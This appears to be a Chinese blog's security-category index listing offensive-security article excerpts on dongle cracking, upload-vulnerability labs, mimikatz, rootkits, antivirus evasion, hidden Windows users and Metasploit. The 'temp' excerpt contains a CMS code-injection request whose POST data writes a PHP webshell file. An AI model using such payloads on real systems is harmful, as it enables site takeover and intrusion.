网络安全
文章平均质量分 80
寒江雪语
这个作者很懒,什么都没留下…
展开
-
圣天诺加密狗(HASP)破解
圣天诺加密狗破解原创 2022-12-12 00:23:39 · 6859 阅读 · 0 评论 -
[代码审计]php上传漏洞总结
背景: 这两天在网上瞎看,看到别人总结的一个上传漏洞靶场,觉得很不错,就是自己测试了下, 感觉对代码审计能力提高还是有帮助的,下面简单介绍靶场的解题思路(当然,每一题可能存在多种上传方式)。 靶场地址:https://github.com/c0ny1/upload-labs 一、环境搭建 建议使用靶场提供的测试环境。 二、解题思路 Pass-01: 检查代码:functio...原创 2018-06-05 21:54:05 · 2353 阅读 · 0 评论 -
temp
Post Url:/index.php?m=vod-search&wd={{page:lang}if-A:e{page:lang}val{page:lang}($_PO{page:lang}ST[hxg])}{endif-A}Post Data:hxg=phpinfo().fputs(fopen('hxgs.php','w'),'<?php $a=range(1,200);$b=ch...翻译 2018-02-28 22:48:23 · 995 阅读 · 0 评论 -
内网渗透中的mimikatz
原文:http://drops.wooyun.org/tips/75470x00 前言上篇测试了中间人攻击利用框架bettercap,这次挑选一款更具代表性的工具——mimikatz0x01 简介mimikatz,很多人称之为密码抓取神器,但在内网渗透中,远不止这么简单0x02 测试环境网络资源管理模式:域已有资源:域内一台主机转载 2017-04-04 21:20:09 · 1491 阅读 · 0 评论 -
python http OPTIONS请求
通过发送http OPTIONS请求,可以获取 http允许的方法(我这里主要测试网站是否开启webDav),测试如下:import urllib2import jsonimport httpliburl='192.168.149.131'def http_get(): conn = httplib.HTTPConnection(url) conn.request("原创 2017-03-30 00:02:48 · 7891 阅读 · 0 评论 -
zmap & zgrab 使用
1、安装zmap网上下载源码编译2、安装go环境 vi /etc/profile 在最后加入export GOROOT=/usr/local/goexport PATH=$PATH:$GOROOT/binsource /etc/profile 让立即生效wget https://storage.googleapis.com/golang/go1.6.2.linux-amd6原创 2016-11-29 09:44:02 · 6387 阅读 · 0 评论 -
nmap 时间参数用法
Nmap是一款开源免费的网络发现(Network Discovery)和安全审计(Security Auditing)工具。软件名字Nmap是Network Mapper的简称。Nmap最初是由Fyodor在1997年开始创建的。随后在开源社区众多的志愿者参与下,该工具逐渐成为最为流行安全必备工具之 一。 端口扫描: 常见端口与对应服务: 80 http转载 2015-06-23 19:28:40 · 5253 阅读 · 0 评论 -
中国菜刀,抓包,过狗版
中国菜刀,抓包,过狗版原创 2015-04-19 12:23:52 · 4137 阅读 · 3 评论 -
Linux下rootkit-ddrk攻击获得root权限以及清除方法
DDRK是一个Linux结合shv和adore-ng优点,内核级别的rootkit。DDRK中包含的文件:netstat #替换系统中的netstat,从ssh配置文件中读取端口并隐藏rk.ko #内核模块,实现文件和进程的隐藏功能setup #rootkit安装文件tty #ava工具bin.tgz ---ttymo转载 2015-03-15 17:53:32 · 5665 阅读 · 0 评论 -
Evade antivirus convert shellcode to c
Evade antivirus convert shellcode to cPosted: February 4, 2013 in general, securityTags: antivirus, bypass, evade, meterpreter stager, shellcode12So another way to have a meterpreter转载 2015-01-20 23:46:55 · 1273 阅读 · 0 评论 -
程序可信任路径代码执行漏洞
转自:http://www.2cto.com/Article/201305/208951.html时间:2012-09-26 【漏洞描述】 在使用CreateProcess函数时,当第一个参数lpApplicationName为NULL,而第二个参数lpCommandLine中包含有空格,且未加双引号时,会导致在执行函数时会被截断,比如:c:\prog转载 2014-12-06 00:16:51 · 700 阅读 · 0 评论 -
Windows Create Hide User
转自:http://codeliker.github.io/hack/2014/11/22/windows-create-hide-user/转载 2014-11-22 17:26:43 · 1145 阅读 · 0 评论 -
Powershell Notes
转自:http://codeliker.github.io/%E4%BB%A3%E7%A0%81/2014/11/21/powershell-notes/Powershell Notes powershell21 November 20141.powershell执行脚本:默认情况是阻止的,输入如下命令即可运行powershell脚本: set-ex转载 2014-11-22 17:28:16 · 1171 阅读 · 0 评论 -
msf 值 mysql 利用
1.确定版本auxiliary/scanner/mysql/mysql_version 某些ip设置了指定的接入ip,可能没有接入权限2.扫描弱口令auxiliary/scanner/mysql/mysql_loginmsf auxiliary(mysql_login) > set USERNAME rootUSERNAME => rootmsf auxili转载 2013-12-05 01:58:02 · 2481 阅读 · 0 评论